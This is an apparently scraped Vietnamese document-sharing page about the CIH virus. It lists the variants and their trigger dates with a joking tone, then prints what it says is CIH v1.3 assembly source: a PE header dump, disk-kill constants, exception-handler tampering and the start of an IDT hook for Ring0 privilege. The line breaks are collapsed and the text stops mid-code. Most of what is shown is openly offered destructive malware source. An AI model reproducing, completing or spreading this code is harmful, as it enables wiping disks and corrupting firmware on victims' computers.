Code virus CIH

Code virus CIH : Hiện CIH có 4 loại :- CIH v1.2 (CIH. 1003) phá hoại vào ngày 26 tháng 4 - CIH v1.3 (CIH.1010.A và CIH 1010.B), phá hoại vào ngày 26 tháng 6 - CIH v1.4 (CIH.1019) phá hoại ngày 26 mỗi thángCon này hiện nay vẫn giữ kỉ lục về mức độ phá hoại. Mỗi khi CIH ra tay thì trên thế giới có hằng xxx máy tình bị mất dữ liệu , bị format ổ cứng ,bị hỏng phần cứng. Nó có thể làm cháy mạch trên mainboard. Nghe có ghê không ! Nhưng bạn đừng...
Nội dung trích xuất từ tài liệu:
Code virus CIHCode virus CIH :Hiện CIH có 4 loại :- C IH v1.2 (CIH. 1003) phá hoại vào ngày 26 tháng 4- C IH v1.3 (CIH.1010.A và CIH 1010.B), phá hoại vào ngày 26 tháng 6- C IH v1.4 (CIH.1019) phá hoại ngày 26 mỗi thángCon này hiện nay vẫn giữ kỉ lục về mức độ phá hoại. Mỗi khi CIH ra tay thì trên thế giớicó hằng xxx máy tình bị mất dữ liệu , bị format ổ cứng ,bị hỏng phần cứng. Nó có thể làmcháy mạch trên mainboard. Nghe có ghê không ! Nhưng bạn đừng lo , cách phòng chốngloại này lại rất dễ , không cần đến NAV, chỉ cần bạn đừng bật máy vào ngày 26 thôi :)) .Nhưng đối với những máy không thể tắt được ( vd như trong ngân hàng , quân sự...) thìđành phải update NAV :)) .Còn bây giờ đố bạn tìm ra được đoạn mã nào gây hỏng phần cứng đấy :-)( Code này của con CIH v1.3 ); ****************************************************************************; * Original PE Executable File(Dont Modify this Section) *;****************************************************************************OriginalAppEXE SEGMENTFileHeader:db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000hdb 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000hdb 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdhdb 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068hdb 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072hdb 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fhdb 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06ehdb 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020hdb 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ahdb 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000hdb 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001hdb 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000hdb 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000hdb 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000hdb 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000hdb 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000hdb 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000hdb 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000hdb 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdd 00000000h, VirusSizeOriginalAppEXE ENDS;****************************************************************************; * My Virus Game *;****************************************************************************; *********************************************************; * Constant Define *; *********************************************************TRUE = 1FALSE = 0DEBUG = TRUEMajorVirusVersion = 1MinorVirusVersion = 3VirusVersion = MajorVirusVersion*10h+MinorVirusVersionIF DEBUGFirstKillHardDiskNumber = 81hHookExceptionNumber = 05hELSEFirstKillHardDiskNumber = 80hHookExceptionNumber = 03hENDIFFileNameBufferSize = 7fh; *********************************************************; *********************************************************VirusGame SEGMENTASSUME CS:VirusGame, DS:VirusGame, SS:VirusGameASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame; *********************************************************; * Ring3 Virus Game Initial Program *; *********************************************************MyVirusStart:push ebp; *************************************; * Lets Modify Structured Exception *; * Handing, Prevent Exception Error *; * Occurrence, Especially in NT. *; *************************************lea eax, [esp -04h*2]xor ebx, ebxxchg eax, fs:[ebx]call @0@0:pop ebxlea ecx, StopToRunVirusCode -@0[ebx]push ecxpush eax; *************************************; * Lets Modify *; * IDT(Interrupt Descriptor Table) *; * to Get Ring0 Privilege... * ...